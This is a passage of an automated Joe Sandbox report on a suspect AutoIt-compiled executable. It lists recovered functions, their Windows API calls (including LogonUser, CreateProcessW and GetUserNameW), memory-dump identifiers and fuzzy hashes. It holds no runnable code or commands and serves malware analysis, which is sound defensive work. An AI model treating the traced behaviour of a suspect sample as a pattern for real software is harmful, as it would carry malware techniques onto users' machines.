                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: fa5ef24a0412b47405bdc02cbfd177639d4c9fe744cd3fa5febd7845f382e3fd
                                          • Instruction ID: fc0db66b0c4465f98d60ace31b6424d8d32828c7b9885df6ba28e3fa43ac6df0
                                          • Opcode Fuzzy Hash: fa5ef24a0412b47405bdc02cbfd177639d4c9fe744cd3fa5febd7845f382e3fd
                                          • Instruction Fuzzy Hash: EFD05E3226060EAFEF018EA4DC01EAE3B69EB04B02F408511FE15D50A1C775D835AB60
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E0BC0C,?,?,?,?,?,?), ref: 00E5CC24
                                            • Part of subcall function 00E5B8EF: _memset.LIBCMT ref: 00E5B8FE
                                            • Part of subcall function 00E5B8EF: _memset.LIBCMT ref: 00E5B90D
                                            • Part of subcall function 00E5B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E97F20,00E97F64), ref: 00E5B93C
                                            • Part of subcall function 00E5B8EF: CloseHandle.KERNEL32 ref: 00E5B94E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                          • String ID:
                                          • API String ID: 2364484715-0
                                          • Opcode ID: 749794f2de8ebbbe49245f7933a9e65985ac2712d78950c510a1616398ec67dc
                                          • Instruction ID: b80f71d686532ab35b6768dc99e8259ec4d57db22f314772430894d2d4dda581
                                          • Opcode Fuzzy Hash: 749794f2de8ebbbe49245f7933a9e65985ac2712d78950c510a1616398ec67dc
                                          • Instruction Fuzzy Hash: 04E01231100208DFCB05AF05ED10E8577A5FB08342F014812FE096B2B2CB31A964EF50
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00DD1AEE,?,?,?), ref: 00DD16AB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: eba8ce6bb41c231bced8c9fce4a982ff946cb757716e81e53036d616432ad408
                                          • Instruction ID: b1214fb0f0ce81f63894f2735abcfcc99b92cfc7036fc278feb6a593a36de4a1
                                          • Opcode Fuzzy Hash: eba8ce6bb41c231bced8c9fce4a982ff946cb757716e81e53036d616432ad408
                                          • Instruction Fuzzy Hash: 82E0EC35100208BFCF1AAF91DC12E643B26FB58354F10841AFA451A2A1CA32A921DB60
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL ref: 00E5CBA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
                                          • Opcode ID: beecd96bb8852b004f73d23df4a687157f08706ab970b685361057f75034e8c3
                                          • Instruction ID: 26725a7a78a95ef7991651254ab3a9ac36c5793d3057099e102f1ab202b44bef
                                          • Opcode Fuzzy Hash: beecd96bb8852b004f73d23df4a687157f08706ab970b685361057f75034e8c3
                                          • Instruction Fuzzy Hash: 76E0E235200248EFCB01DF88E844D863BA5AB1D300F014055FA0557262CB71A824EBA1
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL ref: 00E5CB75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
                                          • Opcode ID: a4d57eb5483f865f4d98aabb25fa30617c1f7ef5e52b8568b581377eb26de499
                                          • Instruction ID: 7ef54e830e106ee449b98ee6d4fc876706e8cdbfdb7c3ef0141bba3a87485769
                                          • Opcode Fuzzy Hash: a4d57eb5483f865f4d98aabb25fa30617c1f7ef5e52b8568b581377eb26de499
                                          • Instruction Fuzzy Hash: 2DE0E235204248AFCB01DF88E884E863BA5AB1D300F014055FA0557262CB71A820EB61
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DD20D3
                                            • Part of subcall function 00DD201B: KillTimer.USER32(-00000001,?,?,?,?,00DD16CB,00000000,?,?,00DD1AE2,?,?), ref: 00DD216E
                                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DD1AE2,?,?), ref: 00DD16D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                          • String ID:
                                          • API String ID: 2797419724-0
                                          • Opcode ID: f7e44619f6bab33272605f0ae79ea7183dddf2486b6acba835d00117ac696a54
                                          • Instruction ID: 071f7e075698ef2ccdf3edc3a43180bf78ea9502f8dbdc54e7f8dbf3dab1a06b
                                          • Opcode Fuzzy Hash: f7e44619f6bab33272605f0ae79ea7183dddf2486b6acba835d00117ac696a54
                                          • Instruction Fuzzy Hash: 05D012301403087BDE122FA1DC17F693A19DB64750F508422FA04792D3CA71A810A578
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 00E12242
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 6dd965d46612157c6e9466c621e3bb726990f3af33b9187ba67efff358227a9c
                                          • Instruction ID: 3660a8c167106d2e5eb1d7810e4d1e9d9e29264e85ce3a005188844ac7a7dec7
                                          • Opcode Fuzzy Hash: 6dd965d46612157c6e9466c621e3bb726990f3af33b9187ba67efff358227a9c
                                          • Instruction Fuzzy Hash: B6C04CF1C05109DBDB05DB90D988DEE77BCAB04315F144495E101F2140D7749B448A71
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DFA36A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: ecdf108e6c81d72824768aa9a0060bc06ffe112a105092869d1077f2d928abf3
                                          • Instruction ID: 4fe64c3e6d7fabeea7875e3a2e064e8106fc688e310154dbe79e840b7cfa9fa1
                                          • Opcode Fuzzy Hash: ecdf108e6c81d72824768aa9a0060bc06ffe112a105092869d1077f2d928abf3
                                          • Instruction Fuzzy Hash: 1BA0113000020CAB8A002F82EC08888BFACEB002A2B008020F80C800328B32A8208A80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6260c829435dc066319698bea4dab1178577a49f903abacc4d87b36486aec028
                                          • Instruction ID: 0963a4775617902b557725e6adcf9ed25325e107a16c12ac0f5cfe65673a8507
                                          • Opcode Fuzzy Hash: 6260c829435dc066319698bea4dab1178577a49f903abacc4d87b36486aec028
                                          • Instruction Fuzzy Hash: 9D224A315016A5CBCF28EB16D58467DB7B1EB42304F39846AD89ABB291DB30DD81EB70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: f30c70b9f1be8254a76066fcf9e420dea1bc3db7f76f7552c0160f44a4fcd935
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: 4DC180372050974ADB2D863A943403EBAE15EA27B131F875DE9B3CB5C4EF20D624E630
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 8d461e5956770b558f0251c5cd86b8018f713ddc30feb2f3e242e758f7a4568a
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: 5BC1A0372051974ADB2D463A943403EBBE15EA27B131F876DE9B2DB4C4EF20D624E630
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction ID: d566227ee88601eac5d493776900499baad0fbc28ab2e5d24d6bd92aa8c50cf2
                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                          • Instruction Fuzzy Hash: 6141D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction ID: ea9e86f46915e286ade78313b625c8b82b3955fc87bac3c2d305992b6ac556d1
                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                          • Instruction Fuzzy Hash: 6F019278A01109EFCB88DF98C5909AEF7B5FB48310F608599DC19A7705D730AE51DF80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction ID: c64f97fd6577ccb8d6171446d7614f3f6f01b09fa21dc4b9fb8c1531df992343
                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                          • Instruction Fuzzy Hash: 95019278A00109EFCB88DF98C5909AEF7B6FB88310F608599DC19A7301D730AE51DB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2050203038.0000000001152000.00000040.00000020.00020000.00000000.sdmp, Offset: 01152000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1152000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00E5F910), ref: 00E538AF
                                          • IsWindowVisible.USER32(?), ref: 00E538D3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          • Opcode ID: f8744adf2bf8829c1799f14f2745430827fc760ec6ccaa48dddb88d5b8f19740
                                          • Instruction ID: 6d7f55809a71ed5f3254903102f4c4f9c80f1098743be4238ddafe67ffe8b293
                                          • Opcode Fuzzy Hash: f8744adf2bf8829c1799f14f2745430827fc760ec6ccaa48dddb88d5b8f19740
                                          • Instruction Fuzzy Hash: AAD188302043159BCB14EF20C851A6AB7A5EF95385F116859FC867B7A3CB31EE0ECB61
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00E5A89F
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E5A8D0
                                          • GetSysColor.USER32(0000000F), ref: 00E5A8DC
                                          • SetBkColor.GDI32(?,000000FF), ref: 00E5A8F6
                                          • SelectObject.GDI32(?,?), ref: 00E5A905
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E5A930
                                          • GetSysColor.USER32(00000010), ref: 00E5A938
                                          • CreateSolidBrush.GDI32(00000000), ref: 00E5A93F
                                          • FrameRect.USER32(?,?,00000000), ref: 00E5A94E
                                          • DeleteObject.GDI32(00000000), ref: 00E5A955
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E5A9A0
                                          • FillRect.USER32(?,?,?), ref: 00E5A9D2
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5A9FD
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(00000012), ref: 00E5AB99
                                            • Part of subcall function 00E5AB60: SetTextColor.GDI32(?,?), ref: 00E5AB9D
                                            • Part of subcall function 00E5AB60: GetSysColorBrush.USER32(0000000F), ref: 00E5ABB3
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(0000000F), ref: 00E5ABBE
                                            • Part of subcall function 00E5AB60: GetSysColor.USER32(00000011), ref: 00E5ABDB
                                            • Part of subcall function 00E5AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E5ABE9
                                            • Part of subcall function 00E5AB60: SelectObject.GDI32(?,00000000), ref: 00E5ABFA
                                            • Part of subcall function 00E5AB60: SetBkColor.GDI32(?,00000000), ref: 00E5AC03
                                            • Part of subcall function 00E5AB60: SelectObject.GDI32(?,?), ref: 00E5AC10
                                            • Part of subcall function 00E5AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E5AC2F
                                            • Part of subcall function 00E5AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E5AC46
                                            • Part of subcall function 00E5AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E5AC5B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          • Opcode ID: a71f502f86d0acce76a799c3f316d781570d50dfd76e8871fb2cb5668642c491
                                          • Instruction ID: ce12d1bac03bccb68e67851230baf269ff9e213b0ede18bd60d0ae9b183bdfb2
                                          • Opcode Fuzzy Hash: a71f502f86d0acce76a799c3f316d781570d50dfd76e8871fb2cb5668642c491
                                          • Instruction Fuzzy Hash: E7A19072008301AFD7149F65DC08A6BBBA9FF88326F145F29F962A61E1D770D848CB52
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00E477F1
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E478B0
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E478EE
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E47900
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E47946
                                          • GetClientRect.USER32(00000000,?), ref: 00E47952
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E47996
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E479A5
                                          • GetStockObject.GDI32(00000011), ref: 00E479B5
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E479B9
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E479C9
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E479D2
                                          • DeleteDC.GDI32(00000000), ref: 00E479DB
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E47A07
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E47A1E
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E47A59
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E47A6D
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E47A7E
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E47AAE
                                          • GetStockObject.GDI32(00000011), ref: 00E47AB9
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E47AC4
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E47ACE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
